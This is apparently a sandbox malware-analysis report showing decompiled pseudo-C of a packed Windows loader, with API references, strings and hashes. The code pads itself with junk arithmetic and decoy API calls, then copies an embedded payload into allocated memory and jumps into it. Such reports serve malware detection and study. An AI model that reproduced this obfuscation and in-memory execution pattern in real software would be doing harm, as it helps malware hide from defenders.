                        				_v60 = _v60 + 0x189e08f;
                        				_v60 = _v60 - 0x2cd1dbee;
                        				_v140 = _v140 + 0x7639de4a;
                        				_v144 = _v144 - 0x2f37c91f;
                        				_v116 = _v116 - 0x2bb22a2d;
                        				_v164 = _v164 + 0x6e49c677;
                        				_v160 = _v160 + 0x159d10e0;
                        				_v116 = _v116 + 0x3441d489;
                        				_v128 = _v128 - 0x83f7a80;
                        				_v108 = _v108 + 0x48b5e129;
                        				_v136 = _v136 + 0x56402792;
                        				_v124 = _v124 + 0xbc9365a;
                        				_v92 = _v92 + 0x421015e;
                        				_v168 = _v168 - 0x1e00592f;
                        				_v68 = _v68 - 0x15ce5b3f;
                        				_v68 = _v68 + 0x78fb057a;
                        				_v136 = _v136 - 0x67ec879;
                        				_v80 = _v80 - 0x1bf010b5;
                        				_v68 = _v68 - 0x6f1a8863;
                        				_v144 = _v144 - 0x2898aad2;
                        				_v84 = _v84 - 0x1e9953fd;
                        				_v116 = _v116 + 0x169c25d;
                        				_v96 = _v96 + 0x65ce6471;
                        				_v128 = _v128 + 0x4d7a962f;
                        				_v104 = _v104 - 0x21834542;
                        				_v96 = _v96 + 0x3832462b;
                        				_v72 = _v72 - 0x3743ab43;
                        				_v104 = _v104 + 0x3438b52a;
                        				_v160 = _v160 + 0x387092fa;
                        				_v64 = _v64 - 0x4cde04ab;
                        				_v148 = _v148 - 0x6a02c50f;
                        				_v96 = _v96 + 0x52975e55;
                        				_v160 = _v160 + 0x16ccda85;
                        				_v60 = _v60 - 0x721ba79a;
                        				_v152 = _v152 + 0x3cb8b521;
                        				_v148 = _v148 - 0x2772cc43;
                        				_v112 = _v112 + 0x83387bf;
                        				_v132 = _v132 + 0x530a5665;
                        				_t409 =  *0x445124 - 0x20;
                        				if( *0x445124 == 0x20) {
                        					WriteConsoleA(0, 0, 0,  &_v52, 0);
                        					__imp__IsProcessInJob(0, 0, 0);
                        					GetPriorityClass(0);
                        					_push("pumitafoto");
                        					_push(0);
                        					E00406707(_t387, _t395, _t397, 0, _t409);
                        					_pop(_t390);
                        					E00405FD6( &_v60, _t390);
                        					_push(0);
                        					_v20 = 0;
                        					E0040617D();
                        					E0040625A(_t387, _t397, 0);
                        					_push(0x38);
                        					_push(0);
                        					_push("%s %c");
                        					_push("msimg32.dll");
                        					E00406642(_t387, _t395, _t397, 0, _t409);
                        					E004065EF(_t387, 0, "0.txt", "rb");
                        					_t406 = _t405 + 0x1c;
                        					_push(0);
                        					E004064AE(_t387, _t397, 0, _t409);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					E00406B33(_t387, _t395, _t397, 0, _t409);
                        					_pop(_t394);
                        					_t381 = _t406;
                        					 *_t381 = 0;
                        					 *((intOrPtr*)(_t381 + 4)) = 0;
                        					E00404B2A(__fp0);
                        					st0 = _t412;
                        					E0040694A(_t387, _t395, _t397, 0, _t409);
                        					_t384 = _t406;
                        					 *_t384 = 0;
                        					 *((intOrPtr*)(_t384 + 4)) = 0;
                        					E00404B07(_t412, _t394, 0);
                        					st0 = _t412;
                        					_v36 = _v36 | 0xffffffff;
                        					E00405FF3();
                        				}
                        				LoadLibraryA("kernel32.dll");
                        				_t365 =  *0x42e60c; // 0xfff6195d
                        				 *0x445124 = _t365;
                        				 *0x445128 =  *0x42d66c; // executed
                        				E00404EC6(); // executed
                        				 *[fs:0x0] = _v16;
                        				return 0;
                        			}




















































                        0x004058a1
                        0x004058a4
                        0x004058ad
                        0x004058af
                        0x004058b4
                        0x004058b5
                        0x004058bc
                        0x004058c4
                        0x004058cb
                        0x004058cb
                        0x004058d8
                        0x004058de
                        0x004058de
                        0x004058e1
                        0x004058e9
                        0x004058f1
                        0x004058f9
                        0x00405901
                        0x00405909
                        0x00405911
                        0x00405919
                        0x00405921
                        0x00405929
                        0x00405931
                        0x00405939
                        0x00405941
                        0x00405949
                        0x00405951
                        0x00405959
                        0x00405961
                        0x00405969
                        0x00405971
                        0x00405979
                        0x00405981
                        0x00405989
                        0x00405991
                        0x00405999
                        0x004059a1
                        0x004059a9
                        0x004059b1
                        0x004059b9
                        0x004059c1
                        0x004059c9
                        0x004059d1
                        0x004059d9
                        0x004059e1
                        0x004059e9
                        0x004059f1
                        0x004059f9
                        0x00405a01
                        0x00405a09
                        0x00405a11
                        0x00405a19
                        0x00405a21
                        0x00405a29
                        0x00405a31
                        0x00405a39
                        0x00405a41
                        0x00405a49
                        0x00405a51
                        0x00405a59
                        0x00405a61
                        0x00405a69
                        0x00405a71
                        0x00405a79
                        0x00405a81
                        0x00405a89
                        0x00405a91
                        0x00405a99
                        0x00405aa1
                        0x00405aa9
                        0x00405ab1
                        0x00405ab9
                        0x00405ac1
                        0x00405ac9
                        0x00405ad1
                        0x00405ad9
                        0x00405ae1
                        0x00405ae9
                        0x00405af1
                        0x00405af9
                        0x00405b01
                        0x00405b09
                        0x00405b11
                        0x00405b19
                        0x00405b21
                        0x00405b29
                        0x00405b31
                        0x00405b39
                        0x00405b41
                        0x00405b49
                        0x00405b51
                        0x00405b59
                        0x00405b61
                        0x00405b69
                        0x00405b71
                        0x00405b79
                        0x00405b81
                        0x00405b89
                        0x00405b91
                        0x00405b99
                        0x00405ba1
                        0x00405ba9
                        0x00405bb1
                        0x00405bb9
                        0x00405bc1
                        0x00405bc9
                        0x00405bd1
                        0x00405bd9
                        0x00405be1
                        0x00405be9
                        0x00405bf1
                        0x00405bf9
                        0x00405c01
                        0x00405c09
                        0x00405c11
                        0x00405c19
                        0x00405c21
                        0x00405c29
                        0x00405c31
                        0x00405c39
                        0x00405c41
                        0x00405c49
                        0x00405c51
                        0x00405c59
                        0x00405c61
                        0x00405c69
                        0x00405c71
                        0x00405c79
                        0x00405c81
                        0x00405c89
                        0x00405c91
                        0x00405c99
                        0x00405ca1
                        0x00405ca9
                        0x00405cb1
                        0x00405cb9
                        0x00405cc1
                        0x00405cc9
                        0x00405cd1
                        0x00405cd9
                        0x00405ce1
                        0x00405ce9
                        0x00405cf1
                        0x00405cf9
                        0x00405d01
                        0x00405d09
                        0x00405d11
                        0x00405d19
                        0x00405d21
                        0x00405d29
                        0x00405d31
                        0x00405d39
                        0x00405d41
                        0x00405d49
                        0x00405d51
                        0x00405d59
                        0x00405d61
                        0x00405d69
                        0x00405d71
                        0x00405d79
                        0x00405d81
                        0x00405d89
                        0x00405d91
                        0x00405d99
                        0x00405da1
                        0x00405da9
                        0x00405db1
                        0x00405db9
                        0x00405dc1
                        0x00405dc9
                        0x00405dd1
                        0x00405dd9
                        0x00405de1
                        0x00405de9
                        0x00405df1
                        0x00405df9
                        0x00405e01
                        0x00405e09
                        0x00405e11
                        0x00405e19
                        0x00405e21
                        0x00405e29
                        0x00405e31
                        0x00405e39
                        0x00405e41
                        0x00405e49
                        0x00405e51
                        0x00405e59
                        0x00405e61
                        0x00405e69
                        0x00405e71
                        0x00405e79
                        0x00405e81
                        0x00405e89
                        0x00405e91
                        0x00405e99
                        0x00405ea1
                        0x00405ea9
                        0x00405eb1
                        0x00405eb9
                        0x00405ec1
                        0x00405ec9
                        0x00405ed1
                        0x00405ed8
                        0x00405eea
                        0x00405ef3
                        0x00405efa
                        0x00405f00
                        0x00405f05
                        0x00405f06
                        0x00405f0c
                        0x00405f14
                        0x00405f19
                        0x00405f1a
                        0x00405f21
                        0x00405f28
                        0x00405f2e
                        0x00405f30
                        0x00405f31
                        0x00405f36
                        0x00405f3b
                        0x00405f4b
                        0x00405f50
                        0x00405f53
                        0x00405f54
                        0x00405f5a
                        0x00405f5b
                        0x00405f5c
                        0x00405f5d
                        0x00405f62
                        0x00405f63
                        0x00405f65
                        0x00405f67
                        0x00405f6a
                        0x00405f6f
                        0x00405f72
                        0x00405f78
                        0x00405f7a
                        0x00405f7c
                        0x00405f7f
                        0x00405f84
                        0x00405f86
                        0x00405f95
                        0x00405f95
                        0x00405f9f
                        0x00405fa5
                        0x00405faa
                        0x00405fb4
                        0x00405fb9
                        0x00405fc8
                        0x00405fd3

                        APIs
                        • GetLastError.KERNEL32 ref: 004058CB
                        • TransactNamedPipe.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004058D8
                        • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405EEA
                        • IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 00405EF3
                        • GetPriorityClass.KERNEL32(00000000), ref: 00405EFA
                        • _fprintf.LIBCMT ref: 00405F06
                          • Part of subcall function 0040617D: __lock.LIBCMT ref: 0040619B
                          • Part of subcall function 0040617D: ___sbh_find_block.LIBCMT ref: 004061A6
                          • Part of subcall function 0040617D: ___sbh_free_block.LIBCMT ref: 004061B5
                          • Part of subcall function 0040617D: HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
                          • Part of subcall function 0040617D: GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6
                        • _malloc.LIBCMT ref: 00405F28
                          • Part of subcall function 0040625A: __FF_MSGBANNER.LIBCMT ref: 0040627D
                          • Part of subcall function 0040625A: __NMSG_WRITE.LIBCMT ref: 00406284
                          • Part of subcall function 0040625A: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0040D688,00000001,00000001,00000001,?,004075FA,00000018,00416E70,0000000C,0040768B), ref: 004062D1
                        • _printf.LIBCMT ref: 00405F3B
                        • __wfopen_s.LIBCMT ref: 00405F4B
                          • Part of subcall function 004064AE: _flsall.LIBCMT ref: 004064C2
                        • _fseek.LIBCMT ref: 00405F5D
                          • Part of subcall function 00404B2A: __floor_pentium4.LIBCMT ref: 00404B3C
                        • _puts.LIBCMT ref: 00405F72
                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00405F9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ErrorHeapLast$AllocateClassConsoleFreeLibraryLoadNamedPipePriorityProcessTransactWrite___sbh_find_block___sbh_free_block__floor_pentium4__lock__wfopen_s_flsall_fprintf_fseek_malloc_printf_puts
                        • String ID: %s %c$+F28$/Y$/fY.$0.txt$5[$'$Cgx$NKR[$]q0r$eVS$kernel32.dll$msimg32.dll$pumitafoto$tf71$yLmc$EuY
                        • API String ID: 1973602647-887915793
                        • Opcode ID: ea0dcdbc492347a62dff523787e09d51a988e2e6a3f5fe5f3b1adfabb272b99f
                        • Instruction ID: a227067a1565d44df564c21f8940b96aaf41f162837730878515ae366b2452ea
                        • Opcode Fuzzy Hash: ea0dcdbc492347a62dff523787e09d51a988e2e6a3f5fe5f3b1adfabb272b99f
                        • Instruction Fuzzy Hash: D7F123B28097809FD3A08F66D58850FFBF0BFA57A4F244A0CF29516560E7758A85CF4B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 62%
                        			E00404EC6() {
                        				void* _v6;
                        				short _v8;
                        				char _v12;
                        				long _v16;
                        				long _v20;
                        				char _v24;
                        				long _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				intOrPtr _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				intOrPtr _v80;
                        				intOrPtr _v84;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				intOrPtr _v108;
                        				intOrPtr _v112;
                        				intOrPtr _v116;
                        				intOrPtr _v120;
                        				intOrPtr _v124;
                        				intOrPtr _v128;
                        				intOrPtr _v132;
                        				intOrPtr _v136;
                        				intOrPtr _v140;
                        				intOrPtr _v144;
                        				intOrPtr _v148;
                        				intOrPtr _v152;
                        				intOrPtr _v156;
                        				intOrPtr _v160;
                        				intOrPtr _v164;
                        				intOrPtr _v168;
                        				intOrPtr _v172;
                        				intOrPtr _v176;
                        				intOrPtr _v180;
                        				intOrPtr _v184;
                        				intOrPtr _v188;
                        				intOrPtr _v192;
                        				intOrPtr _v196;
                        				intOrPtr _v200;
                        				intOrPtr _v204;
                        				intOrPtr _v208;
                        				intOrPtr _v212;
                        				intOrPtr _v216;
                        				intOrPtr _v220;
                        				intOrPtr _v224;
                        				intOrPtr _v228;
                        				intOrPtr _v232;
                        				intOrPtr _v236;
                        				intOrPtr _v240;
                        				intOrPtr _v244;
                        				intOrPtr _v248;
                        				intOrPtr _v252;
                        				intOrPtr _v256;
                        				intOrPtr _v260;
                        				intOrPtr _v264;
                        				intOrPtr _v268;
                        				intOrPtr _v272;
                        				intOrPtr _v276;
                        				intOrPtr _v280;
                        				intOrPtr _v284;
                        				intOrPtr _v288;
                        				intOrPtr _v292;
                        				intOrPtr _v296;
                        				intOrPtr _v300;
                        				intOrPtr _v304;
                        				intOrPtr _v308;
                        				intOrPtr _v312;
                        				intOrPtr _v316;
                        				intOrPtr _v320;
                        				intOrPtr _v324;
                        				intOrPtr _v328;
                        				intOrPtr _v332;
                        				intOrPtr _v336;
                        				struct _cpinfo _v356;
                        				char _v420;
                        				void _v1444;
                        				char _v2468;
                        				char _v4516;
                        				void* _t514;
                        				void* _t660;
                        				void* _t661;
                        				void* _t698;
                        				void* _t699;
                        				void* _t700;
                        				void* _t701;
                        
                        				E0040E260(0x11a4);
                        				if( *0x445124 == 0x412) {
                        					E0040650A(0);
                        					_push(0);
                        					E00406520();
                        					_pop(_t660);
                        					E00406E58(0);
                        				}
                        				 *0x445124 =  *0x445124 + 0xb2d3b;
                        				 *0x444ef4 = GetModuleHandleW(L"kernel32.dll"); // executed
                        				_t514 = LocalAlloc(0,  *0x445124); // executed
                        				 *0x444ef0 = _t514; // executed
                        				E00404E1C(_t660); // executed
                        				_t698 = 0;
                        				if( *0x445124 > 0) {
                        					do {
                        						 *((char*)( *0x444ef0 + _t698)) =  *((intOrPtr*)( *0x445128 + _t698 + 0xb2d3b));
                        						if( *0x445124 == 0x292) {
                        							__imp__CreateJobObjectA(0, "kowax");
                        						}
                        						_t698 = _t698 + 1;
                        					} while (_t698 <  *0x445124);
                        				}
                        				_t699 = 0;
                        				do {
                        					if( *0x445124 + _t699 == 0x5e) {
                        						SetFileAttributesA("pawujagobovalewobukalokaw", 0);
                        						GetProfileIntW(L"hiwapikijokutopesowayuzali", L"pudecebubafafelomulawogosu", 0);
                        						GetCPInfo(0,  &_v356);
                        						FoldStringA(0, 0, 0, 0, 0);
                        						GetVolumeInformationA(0,  &_v2468, 0,  &_v28,  &_v20,  &_v16,  &_v1444, 0);
                        						__imp__OpenJobObjectW(0, 0, L"ceyizevojapaxujekoxago");
                        						__imp__GetCalendarInfoW(0, 0, 0,  &_v4516, 0,  &_v24);
                        					}
                        					_t699 = _t699 + 1;
                        				} while (_t699 < 0x40c893);
                        				_t700 = 0;
                        				while(1) {
                        					GetLastError();
                        					if(_t700 < 0x1b92e5b) {
                        						_v132 = 0x67e462f3;
                        						_v124 = 0x5af06d69;
                        						_v16 = 0x550e6073;
                        						_v116 = 0x4b56b9f1;
                        						_v104 = 0x26994589;
                        						_v252 = 0x15985316;
                        						_v120 = 0x27020532;
                        						_v296 = 0x6b9abad0;
                        						_v108 = 0x3e73eb66;
                        						_v68 = 0x7117be28;
                        						_v276 = 0x5da604f3;
                        						_v244 = 0x5f7cd3d6;
                        						_v152 = 0x46721115;
                        						_v336 = 0x1a8f0345;
                        						_v280 = 0x50cc38f8;
                        						_v304 = 0x4a848631;
                        						_v188 = 0x12e177b5;
                        						_v236 = 0x1a4215b7;
                        						_v228 = 0x3b8c8b6a;
                        						_v96 = 0x701071da;
                        						_v220 = 0x4dde9e67;
                        						_v268 = 0x2138cdcc;
                        						_v100 = 0x79e12465;
                        						_v212 = 0x162df8c2;
                        						_v64 = 0x2e27f6b9;
                        						_v180 = 0x363c5601;
                        						_v172 = 0x53842e8a;
                        						_v224 = 0x43e591ec;
                        						_v60 = 0x5eebb39e;
                        						_v52 = 0x72b95c38;
                        						_v48 = 0x2de3b1b4;
                        						_v112 = 0x190b9d4e;
                        						_v92 = 0xfe4109f;
                        						_v184 = 0x54ae7bc5;
                        						_v204 = 0x1411b51d;
                        						_v272 = 0x68c2a4e4;
                        						_v32 = 0x25db7a5;
                        						_v200 = 0x6df25c1e;
                        						_v88 = 0x58a91d;
                        						_v40 = 0x23420a38;
                        						_v144 = 0x749db312;
                        						_v288 = 0x73b9f5d5;
                        						_v260 = 0x78838e04;
                        						_v312 = 0x789f54e0;
                        						_v80 = 0x5f80cd7c;
                        						_v176 = 0x723d872f;
                        						_v84 = 0x1c20b523;
                        						_v20 = 0x39933e29;
                        						_v76 = 0x6a6cdf36;
                        						_v248 = 0x2f4182c9;
                        						_v216 = 0x6ad8ef0c;
                        						_v148 = 0x3a6c434;
                        						_v164 = 0x11c906fe;
                        						_v264 = 0x402d3c3a;
                        						_v136 = 0x52ee4d1b;
                        						_v8 = 0x347c6d6c;
                        						_v208 = 0x11b0372a;
                        						_v44 = 0x2fbc9c79;
                        						_v196 = 0x583c1114;
                        						_v332 = 0x17263a72;
                        						_v36 = 0xce8ec49;
                        						_v328 = 0x205defbb;
                        						_v12 = 0x31df762c;
                        						_v56 = 0x448f7225;
                        						_v324 = 0x3063220d;
                        						_v232 = 0x2f8d2ea5;
                        						_v128 = 0x123be14;
                        						_v28 = 0x551450a8;
                        						_v316 = 0x22150baf;
                        						_v140 = 0x5cf25b83;
                        						_v160 = 0x6950ea8;
                        						_v24 = 0x63c398fe;
                        						_v72 = 0x57b6e36;
                        						_v256 = 0x688827b4;
                        						_v308 = 0x70571416;
                        						_v192 = 0x60f034a3;
                        						_v168 = 0x7d50f5eb;
                        						_v320 = 0x78cd8b6f;
                        						_v240 = 0x1fd366fc;
                        						_v300 = 0x530f435e;
                        						_v292 = 0x28187254;
                        						_v156 = 0x360de2c2;
                        						_v284 = 0x25b3a818;
                        						_v132 = _v132 + 0x5caa67d5;
                        						_v124 = _v124 + 0x3b4ed235;
                        						_v132 = _v132 + 0x9e62a32;
                        						_v116 = _v116 - 0x8187383;
                        						_v132 = _v132 + 0x4c135ce0;
                        						_v16 = _v16 - 0x57444216;
                        						_v252 = _v252 + 0x43039132;
                        						_v252 = _v252 - 0x4703250d;
                        						_v120 = _v120 - 0x17f9cbea;
                        						_v252 = _v252 - 0x5cb4ba90;
                        						_v132 = _v132 - 0x559ddfdf;
                        						_v252 = _v252 - 0x15219df6;
                        						_v252 = _v252 + 0x2ee0da94;
                        						_v124 = _v124 + 0x179c7ebc;
                        						_v252 = _v252 - 0x6ee50c3d;
                        						_v252 = _v252 + 0x736fd115;
                        						_v108 = _v108 + 0x58ac6b3;
                        						_v124 = _v124 - 0x2461dbba;
                        						_v124 = _v124 + 0x53166a3;
                        						_v296 = _v296 + 0x6067d7d6;
                        						_v108 = _v108 - 0x3a59ed01;
                        						_v116 = _v116 + 0x502aa82c;
                        						_v68 = _v68 + 0x40c398db;
                        						_v68 = _v68 + 0x5316f79;
                        						_v276 = _v276 + 0x5e5e1713;
                        						_v336 = _v336 - 0x5012eb95;
                        						_v276 = _v276 - 0x300a3d27;
                        						_v212 = _v212 - 0x40f1be80;
                        						_v100 = _v100 + 0x51907ee;
                        						_v16 = _v16 + 0x53bf2d2;
                        						_v252 = _v252 + 0x62a7deba;
                        						_v236 = _v236 - 0x15a282bd;
                        						_v124 = _v124 + 0x750cf09;
                        						_v268 = _v268 + 0x265a1b03;
                        						_v180 = _v180 - 0x7c55df99;
                        						_v244 = _v244 + 0x5c3f5cea;
                        						_v224 = _v224 + 0x5002a5aa;
                        						_v204 = _v204 - 0x452fd972;
                        						_v100 = _v100 + 0x5a859301;
                        						_v236 = _v236 + 0x5b406f7a;
                        						_v336 = _v336 - 0x554aef4c;
                        						_v68 = _v68 - 0x3a465d9d;
                        						_v296 = _v296 - 0x56a948ad;
                        						_v116 = _v116 + 0x76502a4c;
                        						_v280 = _v280 + 0x1c3c6481;
                        						_v224 = _v224 - 0x31062905;
                        						_v304 = _v304 - 0x19570b2c;
                        						_v112 = _v112 + 0x3720702c;
                        						_v16 = _v16 - 0x324c8da1;
                        						_v108 = _v108 + 0x37f2284d;
                        						_v296 = _v296 + 0x5e4b11c3;
                        						_v172 = _v172 - 0x72ffab49;
                        						_v204 = _v204 + 0x2b31abb;
                        						_v188 = _v188 + 0x3ab7a116;
                        						_v204 = _v204 + 0x45825cdf;
                        						_v52 = _v52 + 0x3949c1ed;
                        						_v244 = _v244 + 0x4b811fea;
                        						_v32 = _v32 - 0x4f9a4dab;
                        						_v84 = _v84 + 0x749ceff;
                        						_v204 = _v204 + 0x10bffb89;
                        						_v108 = _v108 - 0x2b0f6f5f;
                        						_v236 = _v236 + 0x3365b823;
                        						_v212 = _v212 - 0x42ff9f92;
                        						_v244 = _v244 + 0x32a1e7fb;
                        						_v76 = _v76 + 0x2058b3c;
                        						_v172 = _v172 + 0x988af5a;
                        						_v144 = _v144 + 0x196202ca;
                        						_v184 = _v184 - 0x7f832484;
                        						_v268 = _v268 - 0x12652de7;
                        						_v20 = _v20 - 0xeafcb8e;
                        						_v136 = _v136 - 0x141cfa96;
                        						_v296 = _v296 + 0x1d7db3b5;
                        						_v60 = _v60 - 0x63ba0c91;
                        						_v88 = _v88 - 0x1ee4938d;
                        						_v80 = _v80 + 0x7743f0d1;
                        						_v276 = _v276 - 0xac60d68;
                        						_v272 = _v272 - 0x1ce466d9;
                        						_v252 = _v252 - 0x400cde42;
                        						_v56 = _v56 + 0x7acaa60e;
                        						_v80 = _v80 - 0x6466e154;
                        						_v136 = _v136 - 0x3d665518;
                        						_v72 = _v72 - 0x2c800c08;
                        						_v68 = _v68 - 0x64c489e9;
                        					}
                        					GetSystemDefaultLCID();
                        					if(_t700 > 0x1b3afd6) {
                        						break;
                        					}
                        					_t700 = _t700 + 1;
                        					if(_t700 < 0x16bae1c0) {
                        						continue;
                        					}
                        					break;
                        				}
                        				E00404D37();
                        				_t661 = 0;
                        				do {
                        					if(_t661 == 0x770e) {
                        						E00404E02(_t661);
                        					}
                        					_t661 = _t661 + 1;
                        				} while (_t661 < 0x286b97d);
                        				_t701 = 0x7b;
                        				do {
                        					if( *0x445124 == 0xf) {
                        						__imp__FindActCtxSectionStringW(0, 0, 0, 0,  &_v420);
                        					}
                        					_t701 = _t701 - 1;
                        				} while (_t701 != 0);
                        				_v12 = 0x184cc;
                        				do {
                        					if( *0x445124 == 0x1833b) {
                        						__imp__GetVolumePathNameA("yeyofatuw layesoxegejepofazugazotigitohoni lohoma",  &_v2468, 0);
                        						FindFirstChangeNotificationA(0, 0, 0);
                        						WriteConsoleW(0,  &_v1444, 0,  &_v16, 0);
                        						GetFileAttributesA(0);
                        						TlsSetValue(0, 0);
                        						__imp__GetConsoleAliasesW( &_v4516, 0, 0);
                        						EnumSystemCodePagesW(0, 0);
                        						GetFileAttributesA(0);
                        						__imp__GetVolumeNameForVolumeMountPointA(0, 0, 0);
                        						_v8 = 0;
                        						asm("stosw");
                        						_push( &_v20);
                        						_push(_v8);
                        						_push(0);
                        						_push(0);
                        						_push(0);
                        						FillConsoleOutputCharacterW();
                        						FoldStringW(0, 0, 0, 0, 0);
                        					}
                        					_t509 =  &_v12;
                        					 *_t509 = _v12 - 1;
                        				} while ( *_t509 != 0);
                        				E00404B4D();
                        				return  *0x444ef0();
                        			}



































































































                        0x00404ece
                        0x00404ee0
                        0x00404ee5
                        0x00404eea
                        0x00404eeb
                        0x00404ef1
                        0x00404ef3
                        0x00404ef3
                        0x00404ef8
                        0x00404f16
                        0x00404f1b
                        0x00404f21
                        0x00404f26
                        0x00404f2b
                        0x00404f33
                        0x00404f35
                        0x00404f47
                        0x00404f54
                        0x00404f5c
                        0x00404f5c
                        0x00404f62
                        0x00404f63
                        0x00404f35
                        0x00404f6b
                        0x00404f6d
                        0x00404f77
                        0x00404f7f
                        0x00404f90
                        0x00404f9e
                        0x00404fa9
                        0x00404fcc
                        0x00404fd9
                        0x00404fee
                        0x00404fee
                        0x00404ff4
                        0x00404ff5
                        0x00405001
                        0x00405003
                        0x00405003
                        0x0040500f
                        0x00405015
                        0x0040501c
                        0x00405023
                        0x0040502a
                        0x00405031
                        0x00405038
                        0x00405042
                        0x00405049
                        0x00405053
                        0x0040505a
                        0x00405061
                        0x0040506b
                        0x00405075
                        0x0040507f
                        0x00405089
                        0x00405093
                        0x0040509d
                        0x004050a7
                        0x004050b1
                        0x004050bb
                        0x004050c2
                        0x004050cc
                        0x004050d6
                        0x004050dd
                        0x004050e7
                        0x004050ee
                        0x004050f8
                        0x00405102
                        0x0040510c
                        0x00405113
                        0x0040511a
                        0x00405121
                        0x00405128
                        0x0040512f
                        0x00405139
                        0x00405143
                        0x0040514d
                        0x00405154
                        0x0040515e
                        0x00405165
                        0x0040516c
                        0x00405176
                        0x00405180
                        0x0040518a
                        0x00405194
                        0x0040519b
                        0x004051a5
                        0x004051ac
                        0x004051b3
                        0x004051ba
                        0x004051c4
                        0x004051ce
                        0x004051d8
                        0x004051e2
                        0x004051ec
                        0x004051f6
                        0x004051fd
                        0x00405207
                        0x0040520e
                        0x00405218
                        0x00405222
                        0x00405229
                        0x00405233
                        0x0040523a
                        0x00405241
                        0x0040524b
                        0x00405255
                        0x0040525c
                        0x00405263
                        0x0040526d
                        0x00405277
                        0x00405281
                        0x00405288
                        0x0040528f
                        0x00405299
                        0x004052a3
                        0x004052ad
                        0x004052b7
                        0x004052c1
                        0x004052cb
                        0x004052d5
                        0x004052df
                        0x004052e9
                        0x004052f3
                        0x004052fa
                        0x0040530c
                        0x0040531e
                        0x00405325
                        0x0040532c
                        0x00405333
                        0x0040534e
                        0x00405358
                        0x0040535f
                        0x00405369
                        0x00405386
                        0x00405390
                        0x0040539a
                        0x004053a1
                        0x004053ab
                        0x004053d1
                        0x004053d8
                        0x004053df
                        0x004053f1
                        0x00405406
                        0x0040540d
                        0x00405414
                        0x0040541b
                        0x00405422
                        0x00405437
                        0x00405441
                        0x0040544b
                        0x00405455
                        0x0040545c
                        0x00405474
                        0x004054a5
                        0x004054af
                        0x004054b6
                        0x004054c0
                        0x004054ca
                        0x004054f0
                        0x004054fa
                        0x00405504
                        0x0040550b
                        0x00405515
                        0x0040551f
                        0x00405526
                        0x00405530
                        0x00405537
                        0x00405541
                        0x0040554b
                        0x00405555
                        0x00405567
                        0x0040556e
                        0x00405580
                        0x0040558a
                        0x00405594
                        0x0040559e
                        0x004055a8
                        0x004055b2
                        0x004055e6
                        0x0040560c
                        0x00405613
                        0x0040561a
                        0x00405624
                        0x0040562b
                        0x00405640
                        0x00405655
                        0x0040565f
                        0x00405666
                        0x00405670
                        0x0040567a
                        0x0040568f
                        0x004056aa
                        0x004056b1
                        0x004056bb
                        0x004056c5
                        0x004056cc
                        0x004056de
                        0x004056e5
                        0x00405711
                        0x0040572c
                        0x00405747
                        0x0040574e
                        0x00405755
                        0x00405770
                        0x00405777
                        0x00405789
                        0x0040578f
                        0x0040579b
                        0x00000000
                        0x00000000
                        0x0040579d
                        0x004057a4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004057a4
                        0x004057aa
                        0x004057af
                        0x004057b1
                        0x004057b7
                        0x004057b9
                        0x004057b9
                        0x004057be
                        0x004057bf
                        0x004057c9
                        0x004057ca
                        0x004057d1
                        0x004057de
                        0x004057de
                        0x004057e4
                        0x004057e4
                        0x004057ed
                        0x004057f4
                        0x004057fe
                        0x00405811
                        0x0040581a
                        0x0040582e
                        0x00405835
                        0x00405839
                        0x00405848
                        0x00405850
                        0x00405857
                        0x0040585c
                        0x00405864
                        0x0040586b
                        0x00405870
                        0x00405871
                        0x00405874
                        0x00405875
                        0x00405876
                        0x00405877
                        0x00405882
                        0x00405882
                        0x00405888
                        0x00405888
                        0x00405888
                        0x00405891
                        0x004058a0

                        APIs
                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00404F07
                        • LocalAlloc.KERNELBASE(00000000), ref: 00404F1B
                        • CreateJobObjectA.KERNEL32(00000000,kowax), ref: 00404F5C
                        • SetFileAttributesA.KERNEL32(pawujagobovalewobukalokaw,00000000), ref: 00404F7F
                        • GetProfileIntW.KERNEL32 ref: 00404F90
                        • GetCPInfo.KERNEL32(00000000,?), ref: 00404F9E
                        • FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404FA9
                        • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00404FCC
                        • OpenJobObjectW.KERNEL32 ref: 00404FD9
                        • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00404FEE
